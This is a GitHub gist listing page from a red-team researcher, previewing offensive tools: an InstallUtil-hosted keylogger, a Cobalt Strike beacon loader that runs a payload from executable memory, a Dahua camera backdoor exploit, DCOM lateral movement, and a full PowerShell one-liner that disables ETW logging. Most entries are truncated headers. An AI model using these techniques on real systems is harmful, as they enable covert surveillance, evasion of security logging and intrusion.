vysecurity
/ InstallUtilMouseKeyLogger.cs
Created
February 27, 2018 16:12
Input Capture - InstallUtil Hosted MouseClick / KeyLogger -
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
vysecurity
/ external_client_filetransfer.cpp
Created
March 30, 2018 13:13
— forked from xpn/external_client_filetransfer.cpp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| // Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread | |
| void spawnBeacon(char *payload, DWORD len) { | |
| HANDLE threadHandle; | |
| DWORD threadId = 0; | |
| char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| memcpy(alloc, payload, len); |
vysecurity
/ dahua-backdoor.py
Created
April 27, 2018 15:29
— forked from avelardi/dahua-backdoor.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python2.7 | |
| # | |
| # Dahua backdoor Generation 2 and 3 | |
| # Author: bashis <mcw noemail eu> March 2017 | |
| # | |
| # Credentials: No credentials needed (Anonymous) | |
| #Jacked from git history | |
| # | |
| import string |
vysecurity
/ CredentialUI.cs
Created
May 2, 2018 16:04
— forked from mayuki/CredentialUI.cs
Windows Common Credential UI Helper for .NET Framework
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * CredentialUI.cs - Windows Credential UI Helper | |
| * | |
| * License: Public Domain | |
| * | |
| */ | |
| using System; | |
| using System.ComponentModel; | |
| using System.Runtime.InteropServices; | |
| using System.Security; |
vysecurity
/ dcom_shellexecute.cna
Created
May 31, 2018 02:45
— forked from 001SPARTaN/dcom_shellexecute.cna
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Lateral movement techniques based on research by enigma0x3 (Matt Nelson) | |
| # https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
| # https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ | |
| # Beacon implementation based on comexec.cna by Raphael Mudge | |
| # https://gist.github.com/rsmudge/8b2f699ea212c09201a5cb65650c6fa2 | |
| # Register alias | |
| beacon_command_register ("dcom_shellexecute", "Lateral movement with DCOM (ShellExecute)", | |
| "Usage: dcom_shellexecute [target] [listener]\n\n" . | |
| "Spawn new Beacon on a target via DCOM ShellExecute Object."); |
vysecurity
/ KillETW.ps1
Created
June 10, 2018 12:47
— forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
vysecurity
/ abandonedInprocServer32.cs
Last active
November 3, 2018 15:39
— forked from matterpreter/abandonedInprocServer32.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Management; | |
| namespace ComAbandonment | |
| { | |
| public class ComAbandonment | |
| { |
OlderNewer